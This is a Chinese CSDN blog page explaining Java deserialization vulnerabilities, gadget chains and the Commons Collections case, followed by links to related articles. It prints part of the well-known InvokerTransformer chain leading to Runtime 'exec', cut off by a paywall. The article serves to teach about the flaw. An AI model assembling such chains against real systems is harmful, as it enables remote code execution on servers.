JAVA反序列化安全

最新推荐文章于 2024-07-21 21:22:27 发布
最新推荐文章于 2024-07-21 21:22:27 发布
阅读量6.1k 收藏 5
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c0c0cf/article/details/52551183
版权
本文探讨了Java反序列化漏洞的历史、特点和不同类型的序列化(如Binary、XML和JSON)。通过案例分析,解释了如何利用XMLDecoder在Restlet应用中执行服务器端代码,以及如何在反序列化中构建执行链。建议的安全措施包括对象白名单控制、数据加密传输、简化反序列化数据结构和在沙盒环境中操作。
摘要由CSDN通过智能技术生成

微信公众号:DebugPwn


新浪微博:

http://weibo.com/u/2275304001/home?wvr=5


漏洞简介:

反序列化漏洞有十年的历史,存在于不同的编程语言中,最为明显的当属Java、PHP、Python、Ruby。漏洞的本质就是反序列化机制打破了数据和对象的边界,导致攻击者注入的恶意序列化数据在反序列化过程中被还原成对象,控制了对象就可能在目标系统上面执行攻击代码。

反序列化漏洞特点:

1)、反序列化对象自身的构造函数或者readObject()函数体中有执行代码的能力。

2)、反序列化的对象readObject()中可以调用另外一个对象,另外一个对象有执行代码的能力。

3)、返序列化的对象readObject()中可以调用另外一个对象,另外一个对应在调用另外一个对象,第三个对象有执行代码的能力,以此类推。

而上面掉用过程就是一个执行链,也叫做Gadget,在构造Gadget一般要用到Java的反射机制。

序列化分类进行分析:

1、Binary序列化反序列化:Object--serialize--data--unerialize--Object

Commons Collections反序列化漏洞

TransformedMap类 public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer)方法可以生成Map对象,并且当Map对象进行get/set操作可执行任意代码。--炸弹

Transformer类有执行代码的构造方法
Transformer[] transforms = new Transformer[] {
 
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer(
                "getMethod",
                new Class[] {String.class, Class[].class},
                new Object[] {
 "getRuntime", new Class[0]}
        ),
        new InvokerTransformer(
                "invoke",
                new Class[] {Object.class, Object[].class},
                new Object[] {
 null, new Object[0]}
        ),
        new InvokerTransformer(
                "exec",
                new Class[] {String[].
最低0.47元/天 解锁文章
0c0c0f
关注
java安全 反序列化(一)
sechelper的博客
12-07 329
java反序列化基础知识,漏洞成因,案例
反序列化字段校验-(接口传入数据的校验)
weixin_40559964的博客
05-24 660
我们会遇到这种情况,比如前端传入一个浮点型数据(例:12.001),然而字段类型却是Long类型,此时,springmvc会自动将该数据强制转化成Long类型(例:12),此时传过来的数据就是12。 但可能由于项目需求,你需要对传入的数据进行校验判断是否为整型,是整型才能进行数据处理,否则抛出异常或者停止该流程的执行。 这时候我们就需要对该数据进行反序列化校验。 通过使用 @JsonDeserialize注解写在字段上面,并且自定义一个反序列化处理类。 /** * 最大连接阈值 */
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
白帽子凯哥聊黑客
12-23 6966
首先,我们定义一个简单的Java类,该类具有可序列化的属性。// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法。
Java反序列化漏洞详解(易懂)
weixin_63350467的博客
07-15 1687
这篇文章主要还是让大家简单理解为啥会出现这个漏洞,以及查找漏洞的流程。对于java的序列化,反射,类加载等知识点的详细内容,大家可以自己感兴趣找找。这里主要还是让和我一样的小白简单理解一下这个漏洞的原理。
Dynamic Code Evaluation:Unsafe Deserialization 动态代码评估:不安全反序列化
Dearzh的博客
11-15 500
Abstract: 在运行时对用户控制的对象流进行反序列化,会让攻击者有机会在服务器上执行任意代码、滥用应用程序逻辑和/或导致 Denial of Service。 Explanation: Java 序列化会将对象图转换为字节流(包含对象本身和必要的元数据),以便通过字节流进行重构。开发人员可以创建自定义代码,以协助 Java 对象反序列化过程,在此期间,他们甚至可以使用其他对象或代理替代反...
初识Java反序列化
m0_71563599的博客
06-04 1624
研究某产品反序列化EXP时,搜集到的POC只有一段16进制字节序列难以利用,遂有下文对Java序列化和反序列化的学习。大致内容如下:序列化和反序列化示例序列化数据组成解构反序列化漏洞形成原理序列化: 将程序运行时所需要的Java对象转化为字节序列并存储在文件系统中,一般为.ser后缀的文件,ObjectOutputStream.writeObject()方法可以将对象序列化。反序列化: 将存储在文件系统的字节序列转化成对象供程序使用,ObjectInputStream.readObject()方法可以将字节
Java反序列化安全漏洞防控
04-19
Java反序列化安全漏洞是一种严重的安全威胁,它主要发生在Java程序处理序列化数据时。序列化是Java中的一种机制,可以将对象状态转换为字节流,以便存储或传输。反序列化则是将字节流恢复为Java对象的过程。 在Java...
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
java反序列化利用程序UI版Beta1.1.rar
07-20
8. **Java反序列化工具**:如"java反序列化利用程序UI版Beta1.1"这样的工具,可能是为了帮助安全研究人员测试和理解反序列化漏洞的工作原理,通过图形用户界面(GUI)提供了一种更直观的方式来实验和分析Java反序列...
Java反序列化安全漏洞怎么回事?
Firstlucky77的博客
06-21 949
序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。Java 序列化是指把 Java 对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类的 readObject() 方法用于反序列化。序列化和反序列化本身并不存在问题。但当输入的反序列化的数据可被用户控制,那么攻击者即可通过构
Java安全漫谈 - 07.反序列化篇(1)1
08-03
总之,理解Java反序列化的工作原理以及其潜在的安全风险至关重要。开发者需要谨慎处理反序列化过程,以防止恶意利用并确保应用程序的安全性。通过遵循安全编码实践,结合使用安全框架和库,可以显著降低反序列化漏洞...
反序列化漏洞原理和防御方式
热门推荐
wangyuxiang946的博客
07-18 1万+
攻击者通过构造恶意的参数,使数据在在反序列化后生成特殊的对象类型,从而执行恶意代码 问题的根源在于,反序列化时没有对生成的对象类型做限制
java安全 反序列化(二)
sechelper的博客
12-07 619
java反射,CC6链源码分析,LazyMap利用连,ysoserial工具
【序列化】UNSAFE_DESERIALIZATION 不安全反序列化反序列化漏洞
m0_45406092的博客
08-21 6873
Unsafe Deserialization 进行代码检查时,Coverity工具在进行json转换时,报Unsafe Deserialization错误,字面意思是不安全反序列化,根本原因就是反序列化会有漏洞导致的。 看完下文反序列化漏洞的原理后,我们就知道该如何解决这个问题了。 反序列化漏洞 ...
序列化与反序列化(Protocol buff 与 Java序列化协议的比较)
worn_xiao的博客
12-08 312
1. 什么是序列化与反序列化? 序列化就是将代码中的对象的某一个状态转化成字节数组的过程,也就是转化成二进制文件的过程。反序列化与之相反。 2. 为什么要进行序列化? 在将对象存储在文件中或者通过网络进行传输的时候,对象是不能直接存储和传输的,所以要将它序列化为对应的二进制代码。 3. 实现序列化的常用方式有哪些? 使用Java的序列化协议(实现Ser...
OWASP--08反序列化漏洞
WM_NNXX的博客
08-12 501
2017-08不安全反序列化安全反序列化会导致远程代码执行。即使反序列化缺陷不会导致远程代码执行,攻击者也可以利用它们来执行攻击,包括:重播攻击、注入攻击和特权升级攻击。 应用程序脆弱吗? 如果反序列化进攻者提供的敌意或者篡改过的对象将会使将应用程序和API变的脆弱。 两种主要类型的攻击: 1111111 如果应用中存在可以在反序列化过程中或者之后被改变行为的类,则攻击者可以通过改变应用...
java httpinvoker漏洞_Java反序列化漏洞学习
weixin_39683021的博客
02-16 688
序列化是Java提供的一种对象持久化保存的技术。常规对象在程序结束后会被回收,如果想把对象持久保存方便下次使用,需要序列化和反序列化。序列化有两个前提:类必须实现java.io.serializable接口类所有字段都必须是可序列化的反序列化漏洞利用原理1. 利用重写ObjectInputStream的readObject重写ObjectInputStream的readObject方法时,可执行恶...
Hessian#UnsafeDeserializer对象反序化后初始化的问题
一步一个脚印的专栏
07-31 1277
Hessian#UnsafeDeserializer对象反序化后初始化的问题 场景 交易系统各子服务分批上线时出现交易失败的报警,log日志发现服务通信实例的Map类型的成员变量未被正确初始化NullpointerException异常,因为多个服务系统间使用hessian通信,各系统使用的业务数据对象版本不一致(如A服务版本是1.0.1调用B服务1.0.5版本)新添加的变量没有初始化,进
【渗透入门】反序列化
最新发布
LongL_GuYu的博客
07-21 1179
反序列化漏洞是一种安全漏洞,它发生在应用程序将序列化的数据(通常是从不可信的源接收的数据)反序列化成对象时。序列化是将对象状态转换为可以存储或传输的格式的过程,而反序列化则是相反的过程,即将这些格式转换回对象。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值